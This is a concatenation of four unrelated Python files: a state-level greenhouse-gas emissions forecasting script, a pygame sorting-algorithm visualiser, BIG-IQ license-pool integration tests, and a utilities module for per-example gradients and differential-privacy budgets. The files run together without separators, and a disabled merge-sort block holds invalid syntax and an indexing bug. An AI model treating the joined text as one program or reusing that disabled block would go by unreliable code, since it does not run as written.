residential_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/residential_GHG_FORECAST.txt', index = False) # Aggregating residential production derived GHG emissions for the US US_residential_historical = np.zeros(21) US_residential_GHG = np.zeros(len(residential_forc_df['Forecasted_residential_GHG'][0])) agg_residential = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Residential[i]) agg_residential.append(temp) for i in range(21): for j in range(len(agg_residential)): US_residential_historical[i] += agg_residential[j][i] for i in range(len(residential_forc_df)): for j in range(len(residential_forc_df['Forecasted_residential_GHG'][0])): US_residential_GHG[j] += residential_forc_df['Forecasted_residential_GHG'][i][j] # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(residential_results.resid) residual_std = np.std(residential_results.resid) # Estimate the tobit transformed forecasts # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_residential_GHG)): US_residential_GHG[i] = tobit_transform(US_residential_GHG[i], residual_std) # Do subsetor analyses to provide a more in depth analysis of energy production based GHG emissions # Get raw estimates of state level forecasted emissions for the following cases: forecasted_industrial_ghg = [] beta = industrial_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Industrial[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_industrial_ghg.append(temp) industrial_forcdic = {'State':States, 'Forecasted_industrial_GHG':forecasted_industrial_ghg} industrial_forc_df = pd.DataFrame(industrial_forcdic) print(industrial_forc_df) industrial_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/industrial_GHG_FORECAST.txt', index = False) # Aggregating industrial production derived GHG emissions for the US US_industrial_historical = np.zeros(21) US_industrial_GHG = np.zeros(len(industrial_forc_df['Forecasted_industrial_GHG'][0])) agg_industrial = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Industrial[i]) agg_industrial.append(temp) for i in range(21): for j in range(len(agg_industrial)): US_industrial_historical[i] += agg_industrial[j][i] for i in range(len(industrial_forc_df)): for j in range(len(industrial_forc_df['Forecasted_industrial_GHG'][0])): US_industrial_GHG[j] += industrial_forc_df['Forecasted_industrial_GHG'][i][j] # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(industrial_results.resid) residual_std = np.std(industrial_results.resid) # Estimate the tobit transformed forecasts # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_industrial_GHG)): US_industrial_GHG[i] = tobit_transform(US_industrial_GHG[i], residual_std) # Do subsetor analyses to provide a more in depth analysis of energy production based GHG emissions # Get raw estimates of state level forecasted emissions for the following cases: forecasted_transportation_ghg = [] beta = transportation_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Transportation[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_transportation_ghg.append(temp) transportation_forcdic = {'State':States, 'Forecasted_transportation_GHG':forecasted_transportation_ghg} transportation_forc_df = pd.DataFrame(transportation_forcdic) print(transportation_forc_df) transportation_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/transportation_GHG_FORECAST.txt', index = False) # Aggregating transportation production derived GHG emissions for the US US_transportation_historical = np.zeros(21) US_transportation_GHG = np.zeros(len(transportation_forc_df['Forecasted_transportation_GHG'][0])) agg_transportation = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Transportation[i]) agg_transportation.append(temp) for i in range(21): for j in range(len(agg_transportation)): US_transportation_historical[i] += agg_transportation[j][i] for i in range(len(transportation_forc_df)): for j in range(len(transportation_forc_df['Forecasted_transportation_GHG'][0])): US_transportation_GHG[j] += transportation_forc_df['Forecasted_transportation_GHG'][i][j] # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(transportation_results.resid) residual_std = np.std(transportation_results.resid) # Estimate the tobit transformed forecasts # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_transportation_GHG)): US_transportation_GHG[i] = tobit_transform(US_transportation_GHG[i], residual_std) # Do subsetor analyses to provide a more in depth analysis of energy production based GHG emissions # Get raw estimates of state level forecasted emissions for the following cases: forecasted_electric_ghg = [] beta = electric_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Electric_Power[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_electric_ghg.append(temp) electric_forcdic = {'State':States, 'Forecasted_electric_GHG':forecasted_electric_ghg} electric_forc_df = pd.DataFrame(electric_forcdic) print(electric_forc_df) electric_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/electric_GHG_FORECAST.txt', index = False) # Aggregating electric production derived GHG emissions for the US US_electric_historical = np.zeros(21) US_electric_GHG = np.zeros(len(electric_forc_df['Forecasted_electric_GHG'][0])) agg_electric = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Electric_Power[i]) agg_electric.append(temp) for i in range(21): for j in range(len(agg_electric)): US_electric_historical[i] += agg_electric[j][i] for i in range(len(electric_forc_df)): for j in range(len(electric_forc_df['Forecasted_electric_GHG'][0])): US_electric_GHG[j] += electric_forc_df['Forecasted_electric_GHG'][i][j] # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(electric_results.resid) residual_std = np.std(electric_results.resid) # Estimate the tobit transformed forecasts # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_electric_GHG)): US_electric_GHG[i] = tobit_transform(US_electric_GHG[i], residual_std) # Do subsetor analyses to provide a more in depth analysis of energy production based GHG emissions # Get raw estimates of state level forecasted emissions for the following cases: forecasted_fugitive_ghg = [] beta = fugitive_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Fugitive[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_fugitive_ghg.append(temp) fugitive_forcdic = {'State':States, 'Forecasted_fugitive_GHG':forecasted_fugitive_ghg} fugitive_forc_df = pd.DataFrame(fugitive_forcdic) print(fugitive_forc_df) fugitive_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/fugitive_GHG_FORECAST.txt', index = False) # Aggregating fugitive production derived GHG emissions for the US US_fugitive_historical = np.zeros(21) US_fugitive_GHG = np.zeros(len(fugitive_forc_df['Forecasted_fugitive_GHG'][0])) agg_fugitive = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Fugitive[i]) agg_fugitive.append(temp) for i in range(21): for j in range(len(agg_fugitive)): US_fugitive_historical[i] += agg_fugitive[j][i] for i in range(len(fugitive_forc_df)): for j in range(len(fugitive_forc_df['Forecasted_fugitive_GHG'][0])): US_fugitive_GHG[j] += fugitive_forc_df['Forecasted_fugitive_GHG'][i][j] # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(fugitive_results.resid) residual_std = np.std(fugitive_results.resid) # Estimate the tobit transformed forecasts # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_fugitive_GHG)): US_fugitive_GHG[i] = tobit_transform(US_fugitive_GHG[i], residual_std) # Lastly, aggregate subsector emissions forecasts and compare to energy emissions forecasts subsector_aggregated = US_commercial_GHG + US_residential_GHG + US_industrial_GHG + US_transportation_GHG + US_electric_GHG + US_fugitive_GHG subsector_aggregated = subsector_aggregated / ratio_mean # Plotting subsector forecasts against estimated forecasts using percentages of full energy sector # Because of the nature of these plots, this section is abandoned -- we will not use % estiamtes for anything, just use the subsector forecasts # Plotting subsector forecasts for all subsectors grouped by model type along with corresponding full energy forecast from same model plt.figure(36) plt.plot(basis, US_commercial_GHG, label = 'Commercial Subsector', color = cm(30)) plt.plot(basis, US_residential_GHG, label = 'Residential Subsector', color = cm(60)) plt.plot(basis, US_industrial_GHG, label = 'Industrial Subsector', color = cm(90)) plt.plot(basis, US_transportation_GHG, label = 'Transportation Subsector', color = cm(120)) plt.plot(basis, US_electric_GHG, label = 'Electric Power Subsector', color = cm(150)) plt.plot(basis, US_fugitive_GHG, label = 'Fugitive Emissions', color = cm(180)) plt.plot(basis, US_energy_GHG, label = 'Energy Production - Total', color = cm(210)) # Add titles and save plt.title('Subsector Level GHG Emissions', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') plt.legend(loc = 9, ncol = 2) plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/subsector_plots.eps') plt.figure(72) plt.plot(basis, US_energy_GHG, label = 'Energy Sector Forecast', color = cm(0)) plt.plot(basis, subsector_aggregated, label = 'Aggregate of Subsector Forecasts', color = cm(120)) # Add titles and save plt.title('Comparison of Aggregated Forecasts at the Subsector Level\nand the Forecast for the Energy Sector', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') plt.legend(loc = 8, ncol = 1) plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/agg_subsector_v_sector.eps') # Testing the various models for aggregated in-sample data fitting # Calculate the data mean Y_bar = [sum(Y_Energy)/len(Y_Energy)]*len(Y_Energy) # Calculate aggregate predicted values agg_val = electric_results.fittedvalues + transportation_results.fittedvalues + industrial_results.fittedvalues + commercial_results.fittedvalues + residential_results.fittedvalues + fugitive_results.fittedvalues # Calculate SSR agg_sr = (agg_val - Y_bar)**2 agg_ssr = sum(agg_sr) # Calculate SSTO agg_sto = (Y_Energy - Y_bar)**2 agg_ssto = sum(agg_sto) # Calculate $R^{2}$ agg_r2 = agg_ssr / agg_ssto # Calculate Adjusted $R^{2}$ agg_ar2 = 1 - ((1 - agg_r2) * ((len(Y_Energy) - 1) / (len(Y_Energy) - (energy_results.df_model + 1)))) # Get Adjusted $R^{2}$ from independent energy sector models ind_ar2 = energy_results.rsquared_adj # Create dataframe of results and write to file models = pd.DataFrame(['AR-1 EKC Model']) ind = pd.DataFrame([ind_ar2]) agg = pd.DataFrame([agg_ar2]) adj_r2_df = pd.concat([models, ind, agg], axis = 1) adj_r2_df.columns = ['Model', 'Independent', 'Aggregate'] adj_r2_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/adjusted_rsquared.txt', index = False) plt.figure(80) base2 = [i for i in range(1991,2012)] plt.plot(base2, historical, label = 'Historical US Energy Sector GHG Emissions', color = 'black') plt.plot(basis, US_energy_GHG, label = 'Energy Sector Forecast', color = cm(0)) plt.plot(basis, subsector_aggregated, label = 'Aggregate of Subsector Forecasts', color = cm(120)) # Add titles and save plt.title('Comparison of Aggregated Forecasts at the Subsector Level\nand the Forecast for the Energy Sector', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') plt.legend(loc = 8, ncol = 1) plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/forcecasts_with_historical_data.eps') # Validating the forecast with EPA data # Loading the EPA Data epadata = pd.read_csv(epapath) # Extracting the non-agricultural total GHG emissions from the EPA data and regressing it against WRI historical data EPA = epadata.Non_Ag[1:len(historical)+1] EPA = stats.add_constant(EPA) val_mod = stats.OLS(historical, EPA) val_res = val_mod.fit() print(val_res.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/validation_results.txt', 'w') file.write(val_res.summary().as_text()) file.close() # Testing forecasts against future EPA data as a validation measure # Scaling EPA data per above regression a = val_res.params['const'] b = val_res.params['Non_Ag'] future_epa = epadata.Non_Ag[len(historical)+1::] future_epa = future_epa*b + a # Plots epaplot = epadata.Non_Ag[1::]*b + a plt.figure(figsize = (8,5)) plt.ylim(bottom = 4000, top = 6500) base2 = [i for i in range(1991,2012)] base3 = [i for i in range(1991,2018)] plt.plot(base2, historical, label = 'Historical US Energy Sector GHG Emissions', color = 'black') plt.plot(basis, US_energy_GHG, label = 'Energy Sector Forecast', color = cm(0)) plt.plot(basis, subsector_aggregated, label = 'Aggregate of Subsector Forecasts', color = cm(120)) plt.plot(base3, epaplot, label = 'EPA Data', color = cm(240)) # Add titles and save plt.title('Comparison of Aggregated Forecasts at the Subsector Level\nand the Forecast for the Energy Sector\n(Linear GDP Model)', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') plt.legend(loc = 8, ncol = 1) plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/forcecasts_with_historical_data_linear.eps') # Generating statistics on forecast accuracy sector = US_energy_GHG[0:6] subsectors = subsector_aggregated[0:6] secs = [(future_epa[i+22] - sector[i])**2 for i in range(len(sector))] subs = [(future_epa[i+22] - subsectors[i])**2 for i in range(len(sector))] MSE_sector = (1 / len(sector)) * sum(secs) MSE_subs = (1 / len(sector)) * sum(subs) print(MSE_sector) print(MSE_subs)
from table import Table from data import Data import pygame class Algorithm: def __init__(self, algo, win=None): self.algo = algo self.win = win def run(self, table): if self.algo == "Insertion Sort": return self.insertion_sort(table) if self.algo == "Quick Sort": return self.quick_sort(table) if self.algo == "Fusion Sort": return self.fusion_sort(table) if self.algo == "Bubble Sort": return self.bubble_sort(table) def insertion_sort(self, table): n = len(table.data) for i in range(n): value = table.data[i].value j = i while j > 0 and table.data[j - 1].value > value: table.data[j] = Data(table.data[j - 1].value, (255, 120, 120)) table.draw() # table.data[j].set_color() j -= 1 for e in range(j, i): table.data[e].set_color() table.data[j] = Data(value, (255, 120, 120)) table.draw() table.data[j].set_color() table.draw() def quick_sort(self, table): def swap(arr, i, j): arr[i], arr[j] = arr[j], arr[i] table.data[i].set_color((255, 120, 120)) table.data[j].set_color((255, 120, 120)) table.draw() table.data[i].set_color() table.data[j].set_color() return arr def partition(arr, low, high): i = low - 1 pivot = arr[high].value table.data[high].set_color((255, 255, 100)) table.draw() for j in range(low, high): if arr[j].value <= pivot: i = i + 1 arr = swap(arr, i, j) arr = swap(arr, i + 1, high) table.data[high].set_color() return i + 1 def quickSort(arr, low, high): if low < high: pi = partition(arr, low, high) arr = quickSort(arr, low, pi - 1) arr = quickSort(arr, pi + 1, high) return arr return quickSort(table.data, 0, len(table.data) - 1) def bubble_sort(self, table): for i in range(len(table.data) - 1, 0, -1): sorted_ = True table.data[i].set_color((255, 255, 120)) for j in range(0, i): if table.data[j + 1].value < table.data[j].value: table.data[j + 1], table.data[j] = table.data[j], table.data[j + 1] sorted_ = False table.data[j + 1].set_color((255, 120, 12)) table.draw() # pygame.time.delay(300) table.data[j + 1].set_color() table.data[i].set_color() if sorted_: return """ def fusion_sort(self, table): def fusion(A, B): from time import sleep sleep(0.2) if len(A) == 0: return B if len(B) == 0: return A A[0].set_color((255, 120, 120)) B[0].set_color((255, 120, 120)) table.draw() A[0].set_color() B[0].set_color() if A[0].value <= B[0].value: return [A[0]] + fusion(A[1:], B) return [B[0]] + fusion(A, B[1:]) def _fusionsort(array): N = len(array) if len(array) <= 1: return array return fusion( _fusionsort(array[: int(N / 2)]), _fusionsort(array[int(N / 2) + 1 :]) ) a = _fusionsort(table.data) print([i.value for i in a]) return a def merge_sort(self, table): def fusion(A, B): if len(A) == 0: return B if len(B) == 0: return A A[0].set_color((255, 120, 120)) B[0].set_color((255, 120, 120)) table.draw() A[0].set_color() B[0].set_color() if A[0].value <= B[0].value: return [A[0]] + fusion(A[1:], B) return [B[0]] + fusion(A, B[1:]) def _fusionsort(i=0, j=len(table.data) - 1): N = j + 1 if N <= 1: if N == 0: return [] return [table.data[i]] return fusion(_fusionsort(0, int(N / 2)), _fusionsort(int(N / 2) + 1, N)) def merge(table, (beg1, last1), (beg2, last2)): if len(table.data[beg1:last1]) == 0: return _ if len(table.data[beg2:last2]) == 0: return _ table.data[beg1].set_color((255, 120, 120)) table.data[beg2].set_color((255, 120, 120)) table.draw() table.data[beg1].set_color() table.data[beg2].set_color() def splitter(table, i=0, j=len(table.data)): N = j + 1 if N <= 1: return (i, N) return merge( table, splitter(table, 0, int(N / 2) + 1), splitter(table, int(N / 2) + 1, N + 1), ) return splitter(table) """
# Copyright 2015-2106 F5 Networks Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import pytest import time from pytest import symbols SKIPIF_MANAGED_DEVICE_MESSAGE = """ You must opt-in to run BIG-IQ license tests. To run them, set the symbols variable 'run_biq_license_tests' to 'True' and the 'biq_bigip_managed_device' variable to the IP address of the BIG-IP to license. """ SKIPIF_UNMANAGED_DEVICE_MESSAGE = """ You must opt-in to run BIG-IQ license tests. To run them, set the symbols variable 'run_biq_license_tests' to 'True' and the 'biq_bigip_unmanaged_device' variable to the IP address of the BIG-IP to license. """ MISSING_SYMBOLS_LICENSE = True if hasattr(symbols, 'run_biq_license_tests'): if symbols.run_biq_license_tests is True: MISSING_SYMBOLS_LICENSE = False pytestmark = pytest.mark.skipif( MISSING_SYMBOLS_LICENSE, reason="You must opt-in to run BIG-IQ license tests." "To run them, set the symbols variable " "'run_biq_license_tests: True'" ) @pytest.fixture(scope="function") def license(mgmt_root): """Creates a license pool to put license offerings in Note that in BIG-IQ 5.1.0 you are able to delete a regkey pool even if it has existing regkeys in it. :param mgmt_root: :return: """ collection = mgmt_root.cm.device.licensing.pool.regkey.licenses_s resource = collection.licenses.create( name='foo' ) yield resource resource.delete() @pytest.fixture(scope='function') def licenses(mgmt_root): licensing = mgmt_root.cm.device.licensing collection = licensing.pool.regkey.licenses_s.get_collection() return collection def wait_for_status(obj, status): for x in range(60): obj.refresh() if obj.status == status: return time.sleep(1) @pytest.fixture(scope='function') def offering(license): resource = license.offerings_s.offerings.create( regKey=symbols.biq_license_regkey, status="ACTIVATING_AUTOMATIC" ) wait_for_status(resource, 'READY') yield resource resource.delete() class TestLicensePoolRegkeyCollection(object): def test_get_collection(self, licenses): assert len(licenses) == 0 class TestLicensePoolRegkey(object): def test_create_v12_license(self, license): resource = license.offerings_s.offerings.create( regKey=symbols.biq_license_regkey, status="ACTIVATING_AUTOMATIC" ) try: for x in range(60): resource.refresh() if resource.status == 'READY': break elif resource.status == 'ACTIVATING_AUTOMATIC_NEED_EULA_ACCEPT': resource.modify( status='ACTIVATING_AUTOMATIC_EULA_ACCEPTED', eulaText=resource.eulaText ) time.sleep(1) assert resource.status == 'READY' assert resource.regKey == symbols.biq_license_regkey finally: resource.delete() class TestDeviceLicensing(object): @pytest.mark.skipif( not hasattr(symbols, 'biq_bigip_unmanaged_device_v13'), reason=SKIPIF_UNMANAGED_DEVICE_MESSAGE ) def test_license_unmanaged_device_v13(self, offering): resource = offering.members_s.members.create( deviceAddress=symbols.biq_bigip_unmanaged_device_v13, username="admin", password="<PASSWORD>", httpsPort=8443 ) wait_for_status(resource, 'LICENSED') try: assert resource.status == 'LICENSED' assert resource.deviceAddress == symbols.biq_bigip_unmanaged_device_v13 finally: resource.delete( id=resource.id, username='admin', password='<PASSWORD>' ) # TODO(Add managed licensing once we have added the /mgmt/cm/global/tasks/device-trust API) # @pytest.mark.skipif( # not hasattr(symbols, 'biq_bigip_managed_device'), # reason=SKIPIF_MANAGED_DEVICE_MESSAGE # ) # def test_license_managed_device(self, offering): # resource = offering.members_s.members.create( # deviceAddress=symbols.biq_bigip_unmanaged_device, # username="admin", # password="<PASSWORD>", # ) # wait_for_status(resource, 'LICENSED') # # try: # assert resource.status == 'LICENSED' # assert resource.deviceAddress == symbols.biq_bigip_unmanaged_device # finally: # resource.delete( # id=resource.id, # username='admin', # password='<PASSWORD>' # )
<gh_stars>1-10 import argparse import sys import os import subprocess import numpy as np import pandas as pd import torch from fastgc.dataset.img_data import load_dataset from fastgc.dataset.text_data import load_imdb from fastgc.activation import act_func_list def check_gpu_memory(): """ Computes the size of available GPU memory. """ curr_dir = os.getcwd() is_win32 = (sys.platform == "win32") if is_win32: # On Windows, it assumes 'nvidia-smi.exe' is available at this location nvsmi_dir = r"C:\Program Files\NVIDIA Corporation\NVSMI" os.chdir(nvsmi_dir) result = subprocess.check_output(['nvidia-smi', '--query-gpu=memory.used', '--format=csv,nounits,noheader'], encoding='utf-8') gpu_memory = [int(x) for x in result.strip().split('\n')] if is_win32: os.chdir(curr_dir) return gpu_memory def cuda_setup(is_deterministic, gpu_idx=-1): """ Create a device instance for pytorch. It uses a GPU if it is available. When multiple GPUs are available, it chooses the one with the largest available gpu memory. """ use_cuda = torch.cuda.is_available() kwargs = {'num_workers': 4, 'pin_memory': True} if use_cuda else {} if use_cuda: if gpu_idx < 0: # memory_usage = check_gpu_memory() # gpu_idx = np.argmin(memory_usage) gpu_idx = 0 # torch.cuda.set_device(gpu_idx) device = torch.device("cuda:{}".format(gpu_idx)) if not is_deterministic: torch.backends.cudnn.benchmark = True else: device = torch.device("cpu") return device, kwargs def copy_weight_values(models): model_states = [models[i].state_dict() for i in range(1, len(models))] for name, param in models[0].state_dict().items(): for model_state in model_states: if name in model_state: model_state[name].copy_(param) def clip_tensor(data, clip_thresh): """ Clips all elements in the input tensor along the first dimension """ batch_size = data.shape[0] x = data.view(batch_size, -1) data_norm = torch.norm(x, dim=1).detach() to_clip = data_norm > clip_thresh x[to_clip] = x[to_clip] * clip_thresh x[to_clip] /= data_norm[to_clip].unsqueeze(1) def argument_parser(): parser = argparse.ArgumentParser(description='fast per-example grad') parser.add_argument('--data_dir', type=str, default='./datasets') parser.add_argument('--dname', type=str, default='mnist', choices=['mnist', 'cifar10', 'fmnist', 'lsun']) parser.add_argument('--train_alg', type=str, default='batch', choices=['batch', 'reweight', 'naive']) parser.add_argument('--model_name', type=str, default='MLP', choices=['MLP', 'CNN', 'RNN', 'LSTM', 'Transformer', 'resnet18', 'resnet34', 'resnet50', 'resnet101', 'vgg11', 'vgg13', 'vgg16', 'vgg19']) parser.add_argument('--hidden_size', type=int, default=128) parser.add_argument('--hidden_sizes', nargs='+', type=int, default=[128, 256]) parser.add_argument('--channel_sizes', nargs='+', type=int, default=[20, 50]) parser.add_argument('--kernel_sizes', nargs='+', type=int, default=[5, 5]) parser.add_argument('--fc_sizes', nargs='+', type=int, default=[128]) parser.add_argument('--batch_size', type=int, default=128) parser.add_argument('--clip_thresh', type=float, default=1.0) parser.add_argument('--test_batch_size', type=int, default=512) parser.add_argument('--act_func', type=str, default='sigmoid', choices=act_func_list) parser.add_argument('--optimizer', type=str, default='Adam', choices=['Adam', 'SGD', 'RMSprop']) parser.add_argument('--lr', type=float, default=0.001) parser.add_argument('--sigma', type=float, default=0.005) parser.add_argument('--delta', type=float, default=1e-5) # parser.add_argument('--beta1', type=float, default=0.9) # parser.add_argument('--beta2', type=float, default=0.999) parser.add_argument('--rep', type=int, default=10) parser.add_argument('--deterministic', action='store_true') parser.add_argument('--epochs', type=int, default=100) parser.add_argument('--verbose', action='store_true') parser.add_argument('--img_size', type=int, default=256) # only for LSUN dataset # for transformer network parser.add_argument("--embedding_size", type=int, default=200, help="length of embedding vectors") parser.add_argument("--max_vocab_size", type=int, default=50_000, help="Number of words in the vocabulary.") parser.add_argument("--num_layers", type=int, default=1, help="number of layers") parser.add_argument("--num_heads", type=int, default=8, help="number of attention heads") parser.add_argument("--max_seq_len", help="Max sequence length.", default=512, type=int) parser.add_argument("--niter", type=int, default=-1) # parser.add_argument("--download", action='store_true') parser.add_argument("--download", type=bool, default=True) parser.add_argument("--gpu_id", help="gpu_id to use", default=-1, type=int) return parser def float_to_string(value): str_val = "{0}".format(value).replace('.', '') return str_val def conv_outsize(in_size, kernel_size, padding, stride): """ Computes the size of output image after the convolution defined by the input arguments """ out_size = (in_size - kernel_size + (2 * padding)) // stride out_size += 1 return out_size def compute_epsilon(clip_thresh, delta, sigma, batch_size, epochs): """ Computes the privacy parameters for differential privacy """ if clip_thresh <= 0 or sigma <= 0: return 0.0, 0.0, 0.0 sens = clip_thresh / batch_size log_delta = np.log(1./delta) alpha = 1. + sigma*np.sqrt(2*log_delta) / (sens*epochs) rdp_eps = alpha * epochs*(sens**2) / (2*(sigma**2)) eps = rdp_eps + log_delta/(alpha-1.0) return alpha, rdp_eps, eps def format_result(loss, acc, etime=None): if etime is None: str_result = ["{0:9.5f} {1:6.2f} {2:6s}".format(l, a, ' ') for l, a in zip(loss, acc)] else: str_result = ["{0:9.5f} {1:6.2f} {2:6.3f}".format(l, a, t) for l, a, t in zip(loss, acc, etime)] return ' '.join(str_result) def io_setup(args, kwargs): # loading data if args.model_name == 'Transformer': train_loader, test_loader, input_size, output_size, embeddings = load_imdb(args) args.dname = 'IMDB' else: train_loader, test_loader = load_dataset(args, kwargs) embeddings = None if args.model_name == 'MLP': input_size = train_loader.dataset[0][0].view(-1).size(0) elif args.model_name in ('RNN', 'LSTM'): C, H, W = train_loader.dataset[0][0].shape input_size = C * W else: input_size = train_loader.dataset[0][0].size(1) # assume C x H x W and H=W output_size = len(train_loader.dataset.classes) if args.model_name == 'CNN': args.channel_sizes = [train_loader.dataset[0][0].size(0)] + args.channel_sizes return train_loader, test_loader, input_size, output_size, embeddings def arrays_to_dataframe(tr_loss, tr_acc, te_loss, te_acc, etime, eps=None): # converting into dataframes perf = { 'tr_loss': tr_loss, 'te_loss': te_loss, 'tr_acc': tr_acc, 'te_acc': te_acc, 'etime': etime, } if eps is not None: perf['eps'] = eps df = pd.DataFrame(perf) df['epoch'] = range(1, len(df)+1) cols = df.columns.tolist() cols = cols[-1:] + cols[:-1] df = df[cols] return df def get_filename(args): filename = '{}_{}_B{}E{}C{}SIG{}'.format(args.model_name, args.dname, args.batch_size, args.epochs, float_to_string(args.clip_thresh), float_to_string(args.sigma)) return filename
